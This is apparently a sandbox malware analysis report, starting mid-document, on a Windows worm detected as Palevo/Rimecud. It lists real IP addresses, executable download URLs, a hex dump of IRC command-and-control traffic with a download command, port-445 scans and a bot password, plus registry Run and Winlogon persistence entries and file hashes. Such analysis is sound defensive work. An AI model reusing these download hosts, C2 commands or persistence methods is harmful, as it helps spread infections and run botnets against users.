204.45.85.210

Remote Host Port Number
112.78.112.208 80
208.53.183.113 80
208.53.183.92 80
218.85.133.201 80
74.63.78.27 80
91.212.127.147 80
204.45.85.210 57221 ircd here
204.45.85.218 57221 ircd here
65.55.92.152 25
76.73.36.42 8800

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://208.53.183.113/nbf.exe
o http://208.53.183.92/usa.exe
o http://208.53.183.92/zalz.exe
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
o http://74.63.78.27/47.exe
o http://91.212.127.147/spm/s_get_host.php?ver=522

MODE #dpi -ix
MODE #! -ix
MODE #Ma -ix
USER SP2-617 * 0 :COMPUTERNAME
MODE [N00_USA_XP_6618489]
@ -ix

There was an outbound traffic produced on port 57221:
00000000 | 5052 5256 4D53 4720 2369 203A 4854 5450 | PRRVMSG #i :HTTP
00000010 | 2053 4554 2068 7474 703A 2F2F 3230 382E | SET http://208.
00000020 | 3533 2E31 3833 2E31 3831 2F35 2E65 7865 | 53.183.181/5.exe
00000030 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
00000040 | 5341 5F58 505F 3636 3138 BCB9 4020 3A73 | SA_XP_6618..@ :s
00000050 | 6361 6E2F 2F20 5472 7969 6E67 2074 6F20 | can// Trying to
00000060 | 6765 7420 6578 7465 726E 616C 2049 502E | get external IP.
00000070 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
00000080 | 5341 5F58 505F 3636 3138 BCB9 4020 3A73 | SA_XP_6618..@ :s
00000090 | 6361 6E2F 2F20 5261 6E64 6F6D 2050 6F72 | can// Random Por
000000A0 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
000000B0 | 6E20 3139 322E 782E 782E 783A 3434 3520 | n 192.x.x.x:445
000000C0 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000000D0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000000E0 | 6D69 6E75 7465 7320 7573 696E 6720 3235 | minutes using 25
000000F0 | 2074 6872 6561 6473 2E0D 0A50 5252 564D | threads…PRRVM
00000100 | 5347 205B 4E30 305F 5553 415F 5850 5F36 | SG [N00_USA_XP_6
00000110 | 3631 38BC B940 203A 7363 616E 2F2F 2054 | 618..@ :scan// T
00000120 | 7279 696E 6720 746F 2067 6574 2065 7874 | rying to get ext
00000130 | 6572 6E61 6C20 4950 2E0D 0A50 5252 564D | ernal IP…PRRVM
00000140 | 5347 205B 4E30 305F 5553 415F 5850 5F36 | SG [N00_USA_XP_6
00000150 | 3631 38BC B940 203A 7363 616E 2F2F 2052 | 618..@ :scan// R
00000160 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
00000170 | 7374 6172 7465 6420 6F6E 2031 3932 2E31 | started on 192.1
00000180 | 3638 2E78 2E78 3A34 3435 2077 6974 6820 | 68.x.x:445 with
00000190 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
000001A0 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
000001B0 | 6573 2075 7369 6E67 2032 3520 7468 7265 | es using 25 thre
000001C0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads…PRRVMSG [N
000001D0 | 3030 5F55 5341 5F58 505F 3636 3138 BCB9 | 00_USA_XP_6618..
000001E0 | 4020 3A73 6361 6E2F 2F20 5365 7175 656E | @ :scan// Sequen
000001F0 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000200 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000210 | 382E 302E 303A 3434 3520 7769 7468 2061 | 8.0.0:445 with a
00000220 | 2064 656C 6179 206F 6620 3520 7365 636F | delay of 5 seco
00000230 | 6E64 7320 666F 7220 3020 6D69 6E75 7465 | nds for 0 minute
00000240 | 7320 7573 696E 6720 3230 2074 6872 6561 | s using 20 threa
00000250 | 6473 2E0D 0A50 5252 564D 5347 205B 4E30 | ds…PRRVMSG [N0
00000260 | 305F 5553 415F 5850 5F36 3631 38BC B940 | 0_USA_XP_6618..@
00000270 | 203A 7363 616E 2F2F 2053 6571 7565 6E74 | :scan// Sequent
00000280 | 6961 6C20 506F 7274 2053 6361 6E20 7374 | ial Port Scan st
00000290 | 6172 7465 6420 6F6E 2031 3932 2E31 3638 | arted on 192.168
000002A0 | 2E31 3436 2E30 3A34 3435 2077 6974 6820 | .146.0:445 with
000002B0 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
000002C0 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
000002D0 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000002E0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads…PRRVMSG [N
000002F0 | 3030 5F55 5341 5F58 505F 3636 3138 BCB9 | 00_USA_XP_6618..
00000300 | 4020 3A73 6361 6E2F 2F20 5365 7175 656E | @ :scan// Sequen
00000310 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000320 | 7461 7274 6564 206F 6E20 3139 322E 302E | tarted on 192.0.
00000330 | 302E 303A 3434 3520 7769 7468 2061 2064 | 0.0:445 with a d
00000340 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000350 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000360 | 7573 696E 6720 3130 2074 6872 6561 6473 | using 10 threads
00000370 | 2E0D 0A50 4153 5320 6C61 6F72 6F73 720D | …PASS laorosr.
00000380 | 0A4E 4349 4B20 5B4E 3030 5F55 5341 5F58 | .NCIK [N00_USA_X
00000390 | 505F 3636 3138 3438 395D 18E7 400D 0A73 | P_6618489]..@..s
000003A0 | 656E 6420 2321 2C23 4D61 206F 6F6F 6F0D | end #!,#Ma oooo.
000003B0 | 0A | .

Other details

* The following ports were open in the system:

Port Protocol Process
1059 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
1061 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
1066 TCP msvmiode.exe (%System%msvmiode.exe)
2120 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2121 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2122 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2123 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2124 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2125 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2126 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2127 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2128 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2129 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2130 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2131 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2132 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2133 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2134 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2135 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2136 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2137 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2138 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2139 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2140 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2141 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2142 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2143 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2144 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2145 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2146 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2147 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2148 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2149 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2150 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2151 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2152 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2153 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2154 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2155 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2156 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2157 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2158 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2159 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2160 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2161 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2162 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2163 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2164 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2165 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2166 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2167 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2168 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2169 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2170 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2171 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2172 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2173 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2174 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2175 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2176 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2177 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2178 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2179 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2180 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2181 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2182 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2183 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2184 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2185 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2186 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2187 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2188 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2189 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2190 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2191 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2192 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2193 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2194 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2195 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2196 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2197 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2198 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2199 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2200 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2201 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2202 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2203 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2204 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2205 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2206 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2207 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2208 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2209 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2210 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2211 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2212 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2213 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2214 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2215 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2216 TCP cfdrive32.exe (%Windir%cfdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”
+ MSODESNV7 = “%System%msvmiode.exe”

so that cfdrive32.exe runs every time Windows starts
so that msvmiode.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup]
+ ridt100413 = “1”
+ id = “52257565423258359958893212222606”
+ host = “91.212.127.147”
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
+ Taskman = “%AppData%ltzqai.exe”

so that ltzqai.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ Tji771 = “C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455fddg.exe”

so that fddg.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon]
+ Shell = “C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455fddg.exe,explorer.exe,%AppData%ltzqai.exe”

so that ltzqai.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
cfdrive32.exe %Windir%cfdrive32.exe 352 256 bytes
msvmiode.exe %System%msvmiode.exe 159 744 bytes
492083.exe %Temp%492083.exe 352 256 bytes
8769.exe %Temp%8769.exe 212 992 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %AppData%ltzqai.exe
%Temp%829.exe 90 112 bytes MD5: 0xC631EBC869294C494BF3ACB70FFA1AFB
SHA-1: 0x63913DDE7F9365F6C8F8F9E5A8C9463956DE7A9E (not available)
2 %Temp%99.exe
c:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455fddg.exe 24 576 bytes MD5: 0x778445E093BBE2B6A46B1F5CF932C650
SHA-1: 0x969910F3BB064848C6DC2D2A21871F0D7E040A86 W32.Pilleuz [Symantec]
P2P-Worm.Win32.Palevo.avji [Kaspersky Lab]
Generic.dx!txn [McAfee]
Mal/Generic-L [Sophos]
TrojanDropper:Win32/Injector.I [Microsoft]
Win-Trojan/Injector.24576.AI [AhnLab]
3 %Temp%492083.exe
%Windir%cfdrive32.exe 86 016 bytes MD5: 0x91CF319F0936F134818632CB1B124EEA
SHA-1: 0x58F72A8883077FCF53EB5EB77D4FF3B82CB54926 (not available)
4 %Temp%8769.exe
%System%msvmiode.exe 200 704 bytes MD5: 0xB6DA48334F9095D09161FEBD92C2E1C3
SHA-1: 0x0077D7C29CECB674F80A8B3941CDEC5499EEBD51 (not available)
5 c:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455Desktop.ini
c:RECYCLERS-1-5-21-2575938324-5574274277-266027715-8428Desktop.ini 63 bytes MD5: 0xE783BDD20A976EAEAAE1FF4624487420
SHA-1: 0xC2A44FAB9DF00B3E11582546B16612333C2F9286 (not available)
6 c:RECYCLERS-1-5-21-2575938324-5574274277-266027715-8428syscr.exe 105 984 bytes MD5: 0x629FC45AE42EDAFC6A1371AA8891BC2A
SHA-1: 0xF9997A1554D063E0BB7323D23042A76D1F01CDAE P2P-Worm.Win32.Palevo.kbu [Kaspersky Lab]
Generic.dx!hv.ah [McAfee]
Mal/EncPk-ME [Sophos]
Worm:Win32/Rimecud.B [Microsoft]
Worm.Win32.Rimecud [Ikarus]
Win32/Autorun.worm.105984 [AhnLab]